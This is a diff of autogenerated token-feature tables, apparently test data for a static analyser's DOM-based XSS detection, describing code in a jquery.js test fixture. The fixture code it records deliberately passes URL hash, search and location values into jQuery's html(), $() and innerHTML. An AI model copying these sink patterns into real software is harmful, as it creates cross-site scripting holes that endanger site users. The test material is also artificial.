    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:11 | exceptional return of $("body") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:11 | exceptional return of $("body") | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:16 | $("body").html | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:16 | $("body").html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:16 | $("body").html | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:16 | $("body").html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:16 | $("body").html | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:35 | $("body ... ainted) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:35 | $("body ... ainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:35 | $("body ... ainted) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:35 | $("body ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:35 | $("body ... ainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:35 | exceptional return of $("body ... ainted) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:35 | exceptional return of $("body ... ainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:35 | exceptional return of $("body ... ainted) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:35 | exceptional return of $("body ... ainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:8:3:8:35 | exceptional return of $("body ... ainted) | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:8:5:8:10 | "body" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:8:5:8:10 | "body" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:8:5:8:10 | "body" | contextFunctionInterfaces | test() | @@ -13834,6 +102261,17 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:8:5:8:10 | "body" | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:8:5:8:10 | "body" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:8:5:8:10 | "body" | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:8:13:8:16 | html | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:8:13:8:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:8:13:8:16 | html | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:8:13:8:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:8:13:8:16 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:8:18:8:24 | "XSS: " | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:8:18:8:24 | "XSS: " | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:8:18:8:24 | "XSS: " | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:8:18:8:24 | "XSS: " | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:8:18:8:24 | "XSS: " | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:8:18:8:24 | "XSS: " | stringConcatenatedWith | -endpoint- tainted | | autogenerated/Xss/DomBasedXss/jquery.js:8:18:8:34 | "XSS: " + tainted | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/jquery.js:8:18:8:34 | "XSS: " + tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:8:18:8:34 | "XSS: " + tainted | contextFunctionInterfaces | test() | @@ -13841,6 +102279,37 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:8:18:8:34 | "XSS: " + tainted | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:8:18:8:34 | "XSS: " + tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:8:18:8:34 | "XSS: " + tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:8:28:8:34 | tainted | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:8:28:8:34 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:8:28:8:34 | tainted | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:8:28:8:34 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:8:28:8:34 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:8:28:8:34 | tainted | stringConcatenatedWith | 'XSS: ' -endpoint- | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:25 | $(windo ... n.hash) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:25 | $(windo ... n.hash) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:25 | $(windo ... n.hash) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:25 | $(windo ... n.hash) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:25 | $(windo ... n.hash) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:25 | exceptional return of $(windo ... n.hash) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:25 | exceptional return of $(windo ... n.hash) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:25 | exceptional return of $(windo ... n.hash) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:25 | exceptional return of $(windo ... n.hash) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:9:3:9:25 | exceptional return of $(windo ... n.hash) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:10 | window | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:10 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:10 | window | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:10 | window | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:10 | window | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:19 | window.location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:19 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:19 | window.location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:19 | window.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:19 | window.location | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:24 | window.location.hash | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:24 | window.location.hash | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:24 | window.location.hash | contextFunctionInterfaces | test() | @@ -13848,12 +102317,42 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:24 | window.location.hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:24 | window.location.hash | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:9:5:9:24 | window.location.hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:9:12:9:19 | location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:9:12:9:19 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:9:12:9:19 | location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:9:12:9:19 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:9:12:9:19 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:9:21:9:24 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:9:21:9:24 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:9:21:9:24 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:9:21:9:24 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:9:21:9:24 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:41 | $("" ... "") | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:41 | $("" ... "") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:41 | $("" ... "") | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:41 | $("" ... "") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:41 | $("" ... "") | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:41 | exceptional return of $("" ... "") | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:41 | exceptional return of $("" ... "") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:41 | exceptional return of $("" ... "") | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:41 | exceptional return of $("" ... "") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:10:3:10:41 | exceptional return of $("" ... "") | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:9 | "" | contextFunctionInterfaces | test() | | autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:9 | "" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:9 | "" | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:9 | "" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:9 | "" | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:9 | "" | stringConcatenatedWith | -endpoint- location.toString() + '' | +| autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:31 | "" + ... tring() | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:31 | "" + ... tring() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:31 | "" + ... tring() | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:31 | "" + ... tring() | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:31 | "" + ... tring() | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:40 | "" + ... "" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:40 | "" + ... "" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:40 | "" + ... "" | contextFunctionInterfaces | test() | @@ -13861,18 +102360,78 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:40 | "" + ... "" | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:40 | "" + ... "" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:10:5:10:40 | "" + ... "" | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:20 | location | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:20 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:20 | location | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:20 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:20 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:29 | location.toString | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:29 | location.toString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:29 | location.toString | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:29 | location.toString | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:29 | location.toString | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:31 | exceptional return of location.toString() | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:31 | exceptional return of location.toString() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:31 | exceptional return of location.toString() | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:31 | exceptional return of location.toString() | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:31 | exceptional return of location.toString() | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:31 | location.toString() | contextFunctionInterfaces | test() | | autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:31 | location.toString() | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:31 | location.toString() | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:31 | location.toString() | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:31 | location.toString() | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:10:13:10:31 | location.toString() | stringConcatenatedWith | '' -endpoint- '' | +| autogenerated/Xss/DomBasedXss/jquery.js:10:22:10:29 | toString | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:10:22:10:29 | toString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:10:22:10:29 | toString | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:10:22:10:29 | toString | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:10:22:10:29 | toString | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:10:35:10:40 | "" | contextFunctionInterfaces | test() | | autogenerated/Xss/DomBasedXss/jquery.js:10:35:10:40 | "" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/jquery.js:10:35:10:40 | "" | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:10:35:10:40 | "" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:10:35:10:40 | "" | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:10:35:10:40 | "" | stringConcatenatedWith | '' + location.toString() -endpoint- | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:9 | elm | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:9 | elm | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:13:7:13:9 | elm | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
